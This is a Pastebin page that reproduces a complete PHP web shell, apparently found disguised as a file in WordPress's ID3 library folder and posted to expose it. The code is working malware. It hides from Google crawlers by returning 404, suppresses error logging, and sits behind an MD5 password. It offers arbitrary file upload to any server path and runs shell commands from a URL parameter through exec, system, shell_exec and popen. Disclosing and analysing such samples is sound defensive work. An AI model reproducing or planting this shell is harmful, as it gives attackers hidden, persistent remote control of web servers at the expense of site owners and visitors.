API tools faq
paste
Advertisement
Guest User

getid3s.php

a guest
Sep 20th, 2019
151
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.62 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3.  * /wp-includes/ID3/getid3s.php SHELL
  4.  * They hide it in the ID3 core plugin
  5.  * unknown author and deployer - auth_pass MD5 doesn't change (redacted here)
  6.  * exposed by @dave_daves
  7.  */
  8.  
  9. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  10.     header('HTTP/1.0 404 Not Found');
  11.     exit;
  12. }
  13. $auth_pass = "•••••••••••••••••••••••••••••"; //md5
  14. @session_start();
  15. @error_reporting(0);
  16. @ini_set('error_log',NULL);
  17. @ini_set('log_errors',0);
  18. @ini_set('max_execution_time',0);
  19. @set_time_limit(0);
  20. @set_magic_quotes_runtime(0);
  21. function printLogin() {
  22.     ?>
  23.     <center>
  24.     <form method=post>
  25.     Password: <input type=password name=pass><input type=submit value='>>'>
  26.     </form></center>
  27.     <?php
  28.     exit;
  29. }
  30. function Ssetcookie($k, $v) {
  31.     $_COOKIE[$k] = $v;
  32.     setcookie($k, $v);
  33. }
  34.  
  35. if(!empty($auth_pass)) {
  36.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  37.         Ssetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  38.  
  39.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  40.         printLogin();
  41. }
  42.  
  43. if(isset($_GET['v'])) {
  44.     $action = trim($_GET['v']);
  45.     switch($action) {
  46.         case 'fuck':
  47.             echo '<b>'.php_uname().'</b><br>';
  48.             echo '<form action="" method="post" enctype="multipart/form-data" name="fuck" id="fuck">';
  49.             echo '<input name="uploadto" type="text" size="80" value="'.getcwd().'"><br />';
  50.             echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  51.             if( $_POST['_upl'] == "Upload" ) {
  52.                 if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) echo '<b>Upload success!</b><br>'.$_POST['uploadto']."/".$_FILES['file']['name'];
  53.                 else echo '<b>Upload failed!</b>';
  54.             }
  55.             break;
  56.         case 'exec':
  57.             if(isset($_GET['cmd'])) {
  58.                 $cmd = $_GET['cmd'];
  59.                 echo '<pre>';
  60.                 echo ex($cmd);
  61.                 echo '</pre>';
  62.             } else die('No command to be executed!');
  63.             break;
  64.         default:
  65.             header("HTTP/1.0 404 Not Found");
  66.             break;
  67.     }
  68. } else header("HTTP/1.0 404 Not Found");
  69.  
  70. function ex($in) {
  71.     $out = '';
  72.     if(function_exists('exec')) {
  73.         @exec($in,$out);
  74.         $out = @join("\n",$out);
  75.     }elseif(function_exists('passthru')) {
  76.         ob_start();
  77.         @passthru($in);
  78.         $out = ob_get_clean();
  79.     }elseif(function_exists('system')) {
  80.         ob_start();
  81.         @system($in);
  82.         $out = ob_get_clean();
  83.     }elseif(function_exists('shell_exec')) $out = shell_exec($in);
  84.     elseif(is_resource($f = @popen($in,"r"))) {
  85.         $out = "";
  86.         while(!@feof($f))
  87.             $out .= fread($f,1024);
  88.         pclose($f);
  89.     }
  90.     return $out;
  91. }
  92. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!